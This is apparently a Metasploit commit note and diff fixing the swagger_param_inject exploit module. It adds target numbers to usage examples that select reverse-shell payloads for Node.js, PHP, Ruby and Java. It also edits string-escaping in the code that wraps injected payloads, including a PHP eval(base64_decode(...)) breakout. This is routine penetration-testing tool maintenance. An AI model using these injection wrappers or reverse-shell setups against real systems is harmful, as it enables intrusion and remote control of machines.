Land rapid7#7023, fixes for swagger exploit

Thanks @sdavis-r7!

See rapid7#7015 as well.

Author: Tod Beardsley

documentation/modules/exploit/multi/fileformat/swagger_param_inject.md

@@ -33,6 +33,7 @@ This attack injects a payload into javascript by terminating a URL path string.
 ```
 
 use exploit/multi/fileformat/swagger_param_inject
+set TARGET 0
 set PAYLOAD nodejs/shell_reverse_tcp
 set INFO_VERSION "1.0.0"
 set SWAGGER_HOST "localhost"
@@ -47,6 +48,7 @@ This attack injects a payload into PHP multiline comment area.
 ```
 
 use exploit/multi/fileformat/swagger_param_inject
+set TARGET 1
 set PAYLOAD php/meterpreter/reverse_tcp 
 set SWAGGER_HOST "localhost"
 run 
@@ -60,6 +62,7 @@ This attack injects a payload into ruby multiline comment area.
 ```
 
 use exploit/multi/fileformat/swagger_param_inject
+set TARGET 3
 set PAYLOAD ruby/shell_reverse_tcp 
 set SWAGGER_HOST "localhost"
 run 
@@ -73,6 +76,7 @@ This attack injects a payload into Java by terminating a URL path string.
 ```
 
 use exploit/multi/fileformat/swagger_param_inject
+set TARGET 2
 set PAYLOAD java/jsp_shell_reverse_tcp 
 set SWAGGER_HOST "localhost"
 run 

modules/exploits/multi/fileformat/swagger_param_inject.rb

@@ -130,7 +130,7 @@ def exploit
       payload_loc = 'PATH'
       payload_prefix = "/a');};};return exports;}));"
       payload_suffix = "(function(){}(this,function(){a=function(){b=function(){new Array('"
-      wrapped_payload = payload_prefix + payload.encoded + payload_suffix
+      wrapped_payload = payload_prefix + payload.encoded.gsub(/"/, '\\"') + payload_suffix
     when 'php'
       payload_loc = 'INFO_DESCRIPTION'
       payload_prefix = "*/ namespace foobar; eval(base64_decode('"